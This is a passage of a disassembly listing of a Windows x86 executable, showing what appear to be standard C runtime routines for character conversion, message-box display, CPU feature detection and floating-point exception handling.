loc_40F6A2:				; CODE XREF: sub_40F64F+23j
					; sub_40F64F+2Fj
		mov	eax, ebx

loc_40F6A4:				; CODE XREF: sub_40F64F+51j
		test	byte ptr [eax+24h], 7Fh
		jnz	short loc_40F6EB
		push	esi
		call	sub_408DD0
		cmp	eax, ebp
		pop	ecx
		jz	short loc_40F6E3
		push	esi
		call	sub_408DD0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_40F6E3
		push	esi
		call	sub_408DD0
		sar	eax, 5
		push	esi
		lea	edi, ds:435300h[eax*4]
		call	sub_408DD0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		pop	ecx
		pop	ecx
		jmp	short loc_40F6E5
; ---------------------------------------------------------------------------

loc_40F6E3:				; CODE XREF: sub_40F64F+64j
					; sub_40F64F+70j
		mov	eax, ebx

loc_40F6E5:				; CODE XREF: sub_40F64F+92j
		test	byte ptr [eax+24h], 80h
		jz	short loc_40F70C

loc_40F6EB:				; CODE XREF: sub_40F64F+59j
		call	sub_405B83
		xor	edi, edi
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h

loc_40F705:				; CODE XREF: sub_40F64F+C3j
					; sub_40F64F+CEj ...
		mov	eax, ebp

loc_40F707:				; CODE XREF: sub_40F64F+11Cj
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_40F70C:				; CODE XREF: sub_40F64F+Fj
					; sub_40F64F+9Aj
		mov	ebx, [esp+10h+arg_0]
		cmp	ebx, ebp
		jz	short loc_40F705
		mov	eax, [esi+0Ch]
		test	al, 1
		jnz	short loc_40F723
		test	al, al
		jns	short loc_40F705
		test	al, 2
		jnz	short loc_40F705

loc_40F723:				; CODE XREF: sub_40F64F+CAj
		xor	edi, edi
		cmp	[esi+8], edi
		jnz	short loc_40F731
		push	esi
		call	sub_40D8AC
		pop	ecx

loc_40F731:				; CODE XREF: sub_40F64F+D9j
		mov	eax, [esi]
		cmp	eax, [esi+8]
		jnz	short loc_40F740
		cmp	[esi+4], edi
		jnz	short loc_40F705
		inc	eax
		mov	[esi], eax

loc_40F740:				; CODE XREF: sub_40F64F+E7j
		dec	dword ptr [esi]
		test	byte ptr [esi+0Ch], 40h
		mov	eax, [esi]
		jz	short loc_40F753
		cmp	[eax], bl
		jz	short loc_40F755
		inc	eax
		mov	[esi], eax
		jmp	short loc_40F705
; ---------------------------------------------------------------------------

loc_40F753:				; CODE XREF: sub_40F64F+F9j
		mov	[eax], bl

loc_40F755:				; CODE XREF: sub_40F64F+FDj
		mov	eax, [esi+0Ch]
		inc	dword ptr [esi+4]
		and	eax, 0FFFFFFEFh
		or	eax, 1
		mov	[esi+0Ch], eax
		mov	eax, ebx
		and	eax, 0FFh
		jmp	short loc_40F707
sub_40F64F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F76D	proc near		; CODE XREF: sub_409217+6FFp
					; sub_40F880+Ep

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	esi
		mov	esi, [ebp+arg_4]
		xor	ebx, ebx
		cmp	esi, ebx
		jz	short loc_40F791
		cmp	[ebp+arg_8], ebx
		jz	short loc_40F791
		cmp	[esi], bl
		jnz	short loc_40F797
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_40F791
		mov	[eax], bx

loc_40F791:				; CODE XREF: sub_40F76D+Fj
					; sub_40F76D+14j ...
		xor	eax, eax

loc_40F793:				; CODE XREF: sub_40F76D+5Aj
					; sub_40F76D+BBj ...
		pop	esi
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_40F797:				; CODE XREF: sub_40F76D+18j
		push	[ebp+arg_C]
		lea	ecx, [ebp+var_10]
		call	sub_402ADF
		mov	eax, [ebp+var_10]
		cmp	[eax+14h], ebx
		jnz	short loc_40F7C9
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_40F7B8
		movzx	cx, byte ptr [esi]
		mov	[eax], cx

loc_40F7B8:				; CODE XREF: sub_40F76D+42j
					; sub_40F76D+10Bj
		cmp	[ebp+var_4], bl
		jz	short loc_40F7C4
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40F7C4:				; CODE XREF: sub_40F76D+4Ej
		xor	eax, eax
		inc	eax
		jmp	short loc_40F793
; ---------------------------------------------------------------------------

loc_40F7C9:				; CODE XREF: sub_40F76D+3Bj
		lea	eax, [ebp+var_10]
		push	eax
		movzx	eax, byte ptr [esi]
		push	eax
		call	sub_40CDB0
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_40F859
		mov	eax, [ebp+var_10]
		mov	ecx, [eax+0ACh]
		cmp	ecx, 1
		jle	short loc_40F80F
		cmp	[ebp+arg_8], ecx
		jl	short loc_40F80F
		xor	edx, edx
		cmp	[ebp+arg_0], ebx
		setnz	dl
		push	edx
		push	[ebp+arg_0]
		push	ecx
		push	esi
		push	9
		push	dword ptr [eax+4]
		call	ds:dword_41D0A0	; MultiByteToWideChar
		test	eax, eax
		mov	eax, [ebp+var_10]
		jnz	short loc_40F81F

loc_40F80F:				; CODE XREF: sub_40F76D+7Bj
					; sub_40F76D+80j
		mov	ecx, [ebp+arg_8]
		cmp	ecx, [eax+0ACh]
		jb	short loc_40F83A
		cmp	[esi+1], bl
		jz	short loc_40F83A

loc_40F81F:				; CODE XREF: sub_40F76D+A0j
		cmp	[ebp+var_4], bl
		mov	eax, [eax+0ACh]
		jz	loc_40F793
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	loc_40F793
; ---------------------------------------------------------------------------

loc_40F83A:				; CODE XREF: sub_40F76D+ABj
					; sub_40F76D+B0j ...
		call	sub_405B83
		mov	dword ptr [eax], 2Ah
		cmp	[ebp+var_4], bl
		jz	short loc_40F851
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40F851:				; CODE XREF: sub_40F76D+DBj
		or	eax, 0FFFFFFFFh
		jmp	loc_40F793
; ---------------------------------------------------------------------------

loc_40F859:				; CODE XREF: sub_40F76D+6Dj
		xor	eax, eax
		cmp	[ebp+arg_0], ebx
		setnz	al
		push	eax
		push	[ebp+arg_0]
		mov	eax, [ebp+var_10]
		push	1
		push	esi
		push	9
		push	dword ptr [eax+4]
		call	ds:dword_41D0A0	; MultiByteToWideChar
		test	eax, eax
		jnz	loc_40F7B8
		jmp	short loc_40F83A
sub_40F76D	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F880	proc near		; CODE XREF: sub_40D20A+18Ep
					; sub_40D20A+1BCp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	0
		push	[esp+4+arg_8]
		push	[esp+8+arg_4]
		push	[esp+0Ch+arg_0]
		call	sub_40F76D
		add	esp, 10h
		retn
sub_40F880	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_40F8A0	proc near		; CODE XREF: sub_409217+9CFp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		mov	eax, [esp+arg_4]
		mov	ecx, [esp+arg_C]
		or	ecx, eax
		mov	ecx, [esp+arg_8]
		jnz	short loc_40F8B9
		mov	eax, [esp+arg_0]
		mul	ecx
		retn	10h
; ---------------------------------------------------------------------------

loc_40F8B9:				; CODE XREF: sub_40F8A0+Ej
		push	ebx
		mul	ecx
		mov	ebx, eax
		mov	eax, [esp+4+arg_0]
		mul	[esp+4+arg_C]
		add	ebx, eax
		mov	eax, [esp+4+arg_0]
		mul	ecx
		add	edx, ebx
		pop	ebx
		retn	10h
sub_40F8A0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F8D4	proc near		; CODE XREF: sub_409E64+15Dp

var_30		= dword	ptr -30h
var_20		= byte ptr -20h
var_18		= byte ptr -18h
var_14		= byte ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		push	ebx
		push	esi
		push	edi
		call	sub_40553A
		xor	ebx, ebx
		cmp	dword_427AC8, ebx
		mov	[ebp+var_10], eax
		mov	[ebp+var_4], ebx
		mov	[ebp+var_8], ebx
		mov	[ebp+var_C], ebx
		jnz	loc_40F9A9
		push	offset aUser32_dll_0 ; "USER32.DLL"
		call	ds:off_41D0E4
		mov	edi, eax
		cmp	edi, ebx
		jnz	short loc_40F914

loc_40F90D:				; CODE XREF: sub_40F8D4+50j
		xor	eax, eax
		jmp	loc_40FA6D
; ---------------------------------------------------------------------------

loc_40F914:				; CODE XREF: sub_40F8D4+37j
		mov	esi, ds:off_41D0E8
		push	offset aMessageboxa ; "MessageBoxA"
		push	edi
		call	esi ; sub_45AAC8
		cmp	eax, ebx
		jz	short loc_40F90D
		push	eax
		call	sub_4054D7
		mov	[esp+30h+var_30], offset aGetactivewindo ; "GetActiveWindow"
		push	edi
		mov	dword_427AC8, eax
		call	esi ; sub_45AAC8
		push	eax
		call	sub_4054D7
		mov	[esp+30h+var_30], offset aGetlastactivep ; "GetLastActivePopup"
		push	edi
		mov	dword_427ACC, eax
		call	esi ; sub_45AAC8
		push	eax
		call	sub_4054D7
		mov	dword_427AD0, eax
		lea	eax, [ebp+var_8]
		push	eax
		call	sub_407CB6
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_40F977
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4031FD
		add	esp, 14h

loc_40F977:				; CODE XREF: sub_40F8D4+94j
		cmp	[ebp+var_8], 2
		jnz	short loc_40F9A9
		push	offset aGetuserobjecti ; "GetUserObjectInformationA"
		push	edi
		call	esi ; sub_45AAC8
		push	eax
		call	sub_4054D7
		cmp	eax, ebx
		pop	ecx
		mov	dword_427AD8, eax
		jz	short loc_40F9A9
		push	offset aGetprocesswind ; "GetProcessWindowStation"
		push	edi
		call	esi ; sub_45AAC8
		push	eax
		call	sub_4054D7
		pop	ecx
		mov	dword_427AD4, eax

loc_40F9A9:				; CODE XREF: sub_40F8D4+22j
					; sub_40F8D4+A7j ...
		mov	eax, dword_427AD4
		mov	esi, [ebp+var_10]
		cmp	eax, esi
		jz	short loc_40FA22
		cmp	dword_427AD8, esi
		jz	short loc_40FA22
		push	eax
		call	sub_405543
		pop	ecx
		call	eax
		cmp	eax, ebx
		jz	short loc_40F9EF
		lea	ecx, [ebp+var_14]
		push	ecx
		push	0Ch
		lea	ecx, [ebp+var_20]
		push	ecx
		push	1
		push	eax
		push	dword_427AD8
		call	sub_405543
		pop	ecx
		call	eax
		test	eax, eax
		jz	short loc_40F9EF
		test	[ebp+var_18], 1
		jnz	short loc_40FA22

loc_40F9EF:				; CODE XREF: sub_40F8D4+F4j
					; sub_40F8D4+113j
		lea	eax, [ebp+var_C]
		push	eax
		call	sub_407CED
		test	eax, eax
		pop	ecx
		jz	short loc_40FA0A
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4031FD
		add	esp, 14h

loc_40FA0A:				; CODE XREF: sub_40F8D4+127j
		cmp	[ebp+var_C], 4
		jb	short loc_40FA19
		or	[ebp+arg_8], 200000h
		jmp	short loc_40FA53
; ---------------------------------------------------------------------------

loc_40FA19:				; CODE XREF: sub_40F8D4+13Aj
		or	[ebp+arg_8], 40000h
		jmp	short loc_40FA53
; ---------------------------------------------------------------------------

loc_40FA22:				; CODE XREF: sub_40F8D4+DFj
					; sub_40F8D4+E7j ...
		mov	eax, dword_427ACC
		cmp	eax, esi
		jz	short loc_40FA53
		push	eax
		call	sub_405543
		pop	ecx
		call	eax
		cmp	eax, ebx
		mov	[ebp+var_4], eax
		jz	short loc_40FA53
		mov	eax, dword_427AD0
		cmp	eax, esi
		jz	short loc_40FA53
		push	[ebp+var_4]
		push	eax
		call	sub_405543
		pop	ecx
		call	eax
		mov	[ebp+var_4], eax

loc_40FA53:				; CODE XREF: sub_40F8D4+143j
					; sub_40F8D4+14Cj ...
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		push	[ebp+var_4]
		push	dword_427AC8
		call	sub_405543
		pop	ecx
		call	eax

loc_40FA6D:				; CODE XREF: sub_40F8D4+3Bj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_40F8D4	endp


; =============== S U B	R O U T	I N E =======================================



sub_40FA72	proc near		; CODE XREF: sub_409E64+27p
					; sub_409E64+38p ...

arg_0		= dword	ptr  4

		mov	ecx, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	ecx, esi
		jl	short loc_40FA9B
		cmp	ecx, 2
		jle	short loc_40FA8E
		cmp	ecx, 3
		jnz	short loc_40FA9B
		mov	eax, dword_4270DC
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40FA8E:				; CODE XREF: sub_40FA72+Ej
		mov	eax, dword_4270DC
		mov	dword_4270DC, ecx
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40FA9B:				; CODE XREF: sub_40FA72+9j
					; sub_40FA72+13j
		call	sub_405B83
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		pop	esi
		retn
sub_40FA72	endp


; =============== S U B	R O U T	I N E =======================================



sub_40FAB8	proc near		; CODE XREF: sub_410107+5Fp
					; DATA XREF: sub_40AA2F:loc_40AA71o
		xor	eax, eax
		retn
sub_40FAB8	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_292. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_40FABC	proc near		; CODE XREF: sub_40FB1Cp
		mov	eax, offset sub_4116FA
		mov	off_423F80, eax
		mov	off_423F84, offset sub_410DF6
		mov	off_423F88, offset sub_410DB4
		mov	off_423F8C, offset sub_410DE8
		mov	off_423F90, offset word_410D5E
		mov	off_423F94, eax
		mov	off_423F98, offset sub_411674
		mov	off_423F9C, offset sub_410D74
		mov	off_423FA0, offset sub_410CDE
		mov	off_423FA4, offset sub_410C6D
		retn
sub_40FABC	endp


; =============== S U B	R O U T	I N E =======================================



sub_40FB1C	proc near		; CODE XREF: sub_407D29+1Cp
					; DATA XREF: _1fieagrn:off_41EDA4o

arg_0		= dword	ptr  4

		call	sub_40FABC
		call	sub_411780
		cmp	[esp+arg_0], 0
		mov	dword_427AE0, eax
		jz	short loc_40FB37
		call	sub_41171B

loc_40FB37:				; CODE XREF: sub_40FB1C+14j
		fnclex
		retn
sub_40FB1C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40FB3A	proc near		; CODE XREF: sub_40FB8A+4Dp

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	0Ch
		push	offset dword_421BF8
		call	__SEH_prolog4
		and	[ebp+ms_exc.disabled], 0
		movapd	xmm0, xmm1
		mov	[ebp+var_1C], 1
		jmp	short loc_40FB7A
; ---------------------------------------------------------------------------
		mov	eax, [ebp+ms_exc.exc_ptr]
		mov	eax, [eax]
		mov	eax, [eax]
		cmp	eax, 0C0000005h
		jz	short loc_40FB6F
		cmp	eax, 0C000001Dh
		jz	short loc_40FB6F
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_40FB6F:				; CODE XREF: sub_40FB3A+29j
					; sub_40FB3A+30j
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]
		and	[ebp+var_1C], 0

loc_40FB7A:				; CODE XREF: sub_40FB3A+1Bj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_40FB3A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40FB8A	proc near		; CODE XREF: sub_40ACDF+7p sub_40FBEAp

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		xor	eax, eax
		push	ebx
		mov	[ebp+var_4], eax
		mov	[ebp+var_C], eax
		mov	[ebp+var_8], eax
		push	ebx
		pushf
		pop	eax
		mov	ecx, eax
		xor	eax, 200000h
		push	eax
		popf
		pushf
		pop	edx
		sub	edx, ecx
		jz	short loc_40FBCD
		push	ecx
		popf
		xor	eax, eax
		cpuid
		mov	[ebp+var_C], eax
		mov	[ebp+var_18], ebx
		mov	[ebp+var_14], edx
		mov	[ebp+var_10], ecx
		mov	eax, 1
		cpuid
		mov	[ebp+var_4], edx
		mov	[ebp+var_8], eax

loc_40FBCD:				; CODE XREF: sub_40FB8A+22j
		pop	ebx
		test	[ebp+var_4], 4000000h
		jz	short loc_40FBE5
		call	sub_40FB3A
		test	eax, eax
		jz	short loc_40FBE5
		xor	eax, eax
		inc	eax
		jmp	short loc_40FBE7
; ---------------------------------------------------------------------------

loc_40FBE5:				; CODE XREF: sub_40FB8A+4Bj
					; sub_40FB8A+54j
		xor	eax, eax

loc_40FBE7:				; CODE XREF: sub_40FB8A+59j
		pop	ebx
		leave
		retn
sub_40FB8A	endp


; =============== S U B	R O U T	I N E =======================================



sub_40FBEA	proc near		; DATA XREF: _1fieagrn:0041D2E4o
		call	sub_40FB8A
		mov	dword_4352E0, eax
		xor	eax, eax
		retn
sub_40FBEA	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40FBF7	proc near		; CODE XREF: sub_4101F8+4Ap

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_0]
		mov	cl, byte ptr [ebp+arg_8]
		push	ebx
		push	esi
		push	edi
		xor	edi, edi
		mov	[eax+4], edi
		mov	eax, [ebp+arg_0]
		xor	ebx, ebx
		mov	[eax+8], edi
		mov	eax, [ebp+arg_0]
		inc	ebx
		test	cl, 10h
		mov	[eax+0Ch], edi
		jz	short loc_40FC29
		mov	eax, [ebp+arg_0]
		or	[eax+4], ebx
		mov	[ebp+arg_8], 0C000008Fh

loc_40FC29:				; CODE XREF: sub_40FBF7+23j
		test	cl, 2
		jz	short loc_40FC3C
		mov	eax, [ebp+arg_0]
		or	dword ptr [eax+4], 2
		mov	[ebp+arg_8], 0C0000093h

loc_40FC3C:				; CODE XREF: sub_40FBF7+35j
		test	cl, bl
		jz	short loc_40FC4E
		mov	eax, [ebp+arg_0]
		or	dword ptr [eax+4], 4
		mov	[ebp+arg_8], 0C0000091h

loc_40FC4E:				; CODE XREF: sub_40FBF7+47j
		test	cl, 4
		jz	short loc_40FC61
		mov	eax, [ebp+arg_0]
		or	dword ptr [eax+4], 8
		mov	[ebp+arg_8], 0C000008Eh

loc_40FC61:				; CODE XREF: sub_40FBF7+5Aj
		test	cl, 8
		jz	short loc_40FC74
		mov	eax, [ebp+arg_0]
		or	dword ptr [eax+4], 10h
		mov	[ebp+arg_8], 0C0000090h

loc_40FC74:				; CODE XREF: sub_40FBF7+6Dj
		mov	esi, [ebp+arg_4]
		mov	ecx, [esi]
		mov	eax, [ebp+arg_0]
		shl	ecx, 4
		not	ecx
		xor	ecx, [eax+8]
		and	ecx, 10h
		xor	[eax+8], ecx
		mov	ecx, [esi]
		mov	eax, [ebp+arg_0]
		add	ecx, ecx
		not	ecx
		xor	ecx, [eax+8]
		and	ecx, 8
		xor	[eax+8], ecx
		mov	ecx, [esi]
		mov	eax, [ebp+arg_0]
		shr	ecx, 1
		not	ecx
		xor	ecx, [eax+8]
		and	ecx, 4
		xor	[eax+8], ecx
		mov	ecx, [esi]
		mov	eax, [ebp+arg_0]
		shr	ecx, 3
		not	ecx
		xor	ecx, [eax+8]
		and	ecx, 2
		xor	[eax+8], ecx
		mov	ecx, [esi]
		mov	eax, [ebp+arg_0]
		shr	ecx, 5
		not	ecx
		xor	ecx, [eax+8]
		and	ecx, ebx
		xor	[eax+8], ecx
		call	sub_4103F7
		test	al, bl
		jz	short loc_40FCE3
		mov	ecx, [ebp+arg_0]
		or	dword ptr [ecx+0Ch], 10h

loc_40FCE3:				; CODE XREF: sub_40FBF7+E3j
		test	al, 4
		jz	short loc_40FCEE
		mov	ecx, [ebp+arg_0]
		or	dword ptr [ecx+0Ch], 8

loc_40FCEE:				; CODE XREF: sub_40FBF7+EEj
		test	al, 8
		jz	short loc_40FCF9
		mov	ecx, [ebp+arg_0]
		or	dword ptr [ecx+0Ch], 4

loc_40FCF9:				; CODE XREF: sub_40FBF7+F9j
		test	al, 10h
		jz	short loc_40FD04
		mov	ecx, [ebp+arg_0]
		or	dword ptr [ecx+0Ch], 2

loc_40FD04:				; CODE XREF: sub_40FBF7+104j
		test	al, 20h
		jz	short loc_40FD0E
		mov	eax, [ebp+arg_0]
		or	[eax+0Ch], ebx

loc_40FD0E:				; CODE XREF: sub_40FBF7+10Fj
		mov	eax, [esi]
		mov	ecx, 0C00h
		and	eax, ecx
		jz	short loc_40FD4E
		cmp	eax, 400h
		jz	short loc_40FD42
		cmp	eax, 800h
		jz	short loc_40FD33
		cmp	eax, ecx
		jnz	short loc_40FD54
		mov	eax, [ebp+arg_0]
		or	dword ptr [eax], 3
		jmp	short loc_40FD54
; ---------------------------------------------------------------------------

loc_40FD33:				; CODE XREF: sub_40FBF7+12Ej
		mov	eax, [ebp+arg_0]
		mov	ecx, [eax]
		and	ecx, 0FFFFFFFEh
		or	ecx, 2

loc_40FD3E:				; CODE XREF: sub_40FBF7+155j
		mov	[eax], ecx
		jmp	short loc_40FD54
; ---------------------------------------------------------------------------

loc_40FD42:				; CODE XREF: sub_40FBF7+127j
		mov	eax, [ebp+arg_0]
		mov	ecx, [eax]
		and	ecx, 0FFFFFFFDh
		or	ecx, ebx
		jmp	short loc_40FD3E
; ---------------------------------------------------------------------------

loc_40FD4E:				; CODE XREF: sub_40FBF7+120j
		mov	eax, [ebp+arg_0]
		and	dword ptr [eax], 0FFFFFFFCh

loc_40FD54:				; CODE XREF: sub_40FBF7+132j
					; sub_40FBF7+13Aj ...
		mov	eax, [esi]
		mov	ecx, 300h
		and	eax, ecx
		jz	short loc_40FD7F
		cmp	eax, 200h
		jz	short loc_40FD72
		cmp	eax, ecx
		jnz	short loc_40FD8C
		mov	eax, [ebp+arg_0]
		and	dword ptr [eax], 0FFFFFFE3h
		jmp	short loc_40FD8C
; ---------------------------------------------------------------------------

loc_40FD72:				; CODE XREF: sub_40FBF7+16Dj
		mov	eax, [ebp+arg_0]
		mov	ecx, [eax]
		and	ecx, 0FFFFFFE7h
		or	ecx, 4
		jmp	short loc_40FD8A
; ---------------------------------------------------------------------------

loc_40FD7F:				; CODE XREF: sub_40FBF7+166j
		mov	eax, [ebp+arg_0]
		mov	ecx, [eax]
		and	ecx, 0FFFFFFEBh
		or	ecx, 8

loc_40FD8A:				; CODE XREF: sub_40FBF7+186j
		mov	[eax], ecx

loc_40FD8C:				; CODE XREF: sub_40FBF7+171j
					; sub_40FBF7+179j
		mov	eax, [ebp+arg_0]
		mov	ecx, [ebp+arg_C]
		shl	ecx, 5
		xor	ecx, [eax]
		and	ecx, 1FFE0h
		xor	[eax], ecx
		mov	eax, [ebp+arg_0]
		or	[eax+20h], ebx
		cmp	[ebp+arg_18], edi
		mov	eax, [ebp+arg_0]
		mov	edi, [ebp+arg_14]
		jz	short loc_40FDD6
		and	dword ptr [eax+20h], 0FFFFFFE1h
		mov	eax, [ebp+arg_10]
		fld	dword ptr [eax]
		mov	eax, [ebp+arg_0]
		fstp	dword ptr [eax+10h]
		mov	eax, [ebp+arg_0]
		or	[eax+60h], ebx
		mov	eax, [ebp+arg_0]
		and	dword ptr [eax+60h], 0FFFFFFE1h
		fld	dword ptr [edi]
		mov	eax, [ebp+arg_0]
		fstp	dword ptr [eax+50h]
		jmp	short loc_40FE0A
; ---------------------------------------------------------------------------

loc_40FDD6:				; CODE XREF: sub_40FBF7+1B7j
		mov	ecx, [eax+20h]
		and	ecx, 0FFFFFFE3h
		or	ecx, 2
		mov	[eax+20h], ecx
		mov	eax, [ebp+arg_10]
		fld	qword ptr [eax]
		mov	eax, [ebp+arg_0]
		fstp	qword ptr [eax+10h]
		mov	eax, [ebp+arg_0]
		or	[eax+60h], ebx
		mov	eax, [ebp+arg_0]
		mov	ecx, [eax+60h]
		and	ecx, 0FFFFFFE3h
		or	ecx, 2
		mov	[eax+60h], ecx
		fld	qword ptr [edi]
		mov	eax, [ebp+arg_0]
		fstp	qword ptr [eax+50h]

loc_40FE0A:				; CODE XREF: sub_40FBF7+1DDj
		call	sub_410402
		lea	eax, [ebp+arg_0]
		push	eax
		push	ebx
		push	0
		push	[ebp+arg_8]
		call	ds:off_41D1AC
		mov	ecx, [ebp+arg_0]
		test	byte ptr [ecx+8], 10h
		jz	short loc_40FE2B
		and	dword ptr [esi], 0FFFFFFFEh

loc_40FE2B:				; CODE XREF: sub_40FBF7+22Fj
		test	byte ptr [ecx+8], 8
		jz	short loc_40FE34
		and	dword ptr [esi], 0FFFFFFFBh

loc_40FE34:				; CODE XREF: sub_40FBF7+238j
		test	byte ptr [ecx+8], 4
		jz	short loc_40FE3D
		and	dword ptr [esi], 0FFFFFFF7h

loc_40FE3D:				; CODE XREF: sub_40FBF7+241j
		test	byte ptr [ecx+8], 2
		jz	short loc_40FE46
		and	dword ptr [esi], 0FFFFFFEFh

loc_40FE46:				; CODE XREF: sub_40FBF7+24Aj
		test	[ecx+8], bl
		jz	short loc_40FE4E
		and	dword ptr [esi], 0FFFFFFDFh

loc_40FE4E:				; CODE XREF: sub_40FBF7+252j
		mov	eax, [ecx]
		and	eax, 3
		xor	ebx, ebx
		sub	eax, ebx
		mov	edx, 0FFFFF3FFh
		jz	short loc_40FE8D
		dec	eax
		jz	short loc_40FE7F
		dec	eax
		jz	short loc_40FE6F
		dec	eax
		jnz	short loc_40FE8F
		or	dword ptr [esi], 0C00h
		jmp	short loc_40FE8F
; ---------------------------------------------------------------------------

loc_40FE6F:				; CODE XREF: sub_40FBF7+26Bj
		mov	eax, [esi]
		and	eax, 0FFFFFBFFh
		or	eax, 800h

loc_40FE7B:				; CODE XREF: sub_40FBF7+294j
		mov	[esi], eax
		jmp	short loc_40FE8F
; ---------------------------------------------------------------------------

loc_40FE7F:				; CODE XREF: sub_40FBF7+268j
		mov	eax, [esi]
		and	eax, 0FFFFF7FFh
		or	eax, 400h
		jmp	short loc_40FE7B
; ---------------------------------------------------------------------------

loc_40FE8D:				; CODE XREF: sub_40FBF7+265j
		and	[esi], edx

loc_40FE8F:				; CODE XREF: sub_40FBF7+26Ej
					; sub_40FBF7+276j ...
		mov	eax, [ecx]
		shr	eax, 2
		and	eax, 7
		sub	eax, ebx
		jz	short loc_40FEB0
		dec	eax
		jz	short loc_40FEA5
		dec	eax
		jnz	short loc_40FEBB
		and	[esi], edx
		jmp	short loc_40FEBB
; ---------------------------------------------------------------------------

loc_40FEA5:				; CODE XREF: sub_40FBF7+2A5j
		mov	eax, [esi]
		and	eax, edx
		or	eax, 200h
		jmp	short loc_40FEB9
; ---------------------------------------------------------------------------

loc_40FEB0:				; CODE XREF: sub_40FBF7+2A2j
		mov	eax, [esi]
		and	eax, edx
		or	eax, 300h

loc_40FEB9:				; CODE XREF: sub_40FBF7+2B7j
		mov	[esi], eax

loc_40FEBB:				; CODE XREF: sub_40FBF7+2A8j
					; sub_40FBF7+2ACj
		cmp	[ebp+arg_18], ebx
		jz	short loc_40FEC7
		fld	dword ptr [ecx+50h]
		fstp	dword ptr [edi]
		jmp	short loc_40FECC
; ---------------------------------------------------------------------------

loc_40FEC7:				; CODE XREF: sub_40FBF7+2C7j
		fld	qword ptr [ecx+50h]
		fstp	qword ptr [edi]

loc_40FECC:				; CODE XREF: sub_40FBF7+2CEj
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
sub_40FBF7	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40FED1	proc near		; CODE XREF: sub_4101F8+21p

var_28		= qword	ptr -28h
var_10		= qword	ptr -10h
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		xor	ebx, ebx
		mov	esi, eax
		and	esi, 1Fh
		inc	ebx
		test	al, 8
		mov	[ebp+var_4], esi
		jz	short loc_40FEFF
		test	byte ptr [ebp+arg_8], bl
		jz	short loc_40FEFF
		push	ebx
		call	sub_410435
		pop	ecx
		and	esi, 0FFFFFFF7h
		jmp	loc_410090
; ---------------------------------------------------------------------------

loc_40FEFF:				; CODE XREF: sub_40FED1+18j
					; sub_40FED1+1Dj
		test	al, 4
		jz	short loc_40FF19
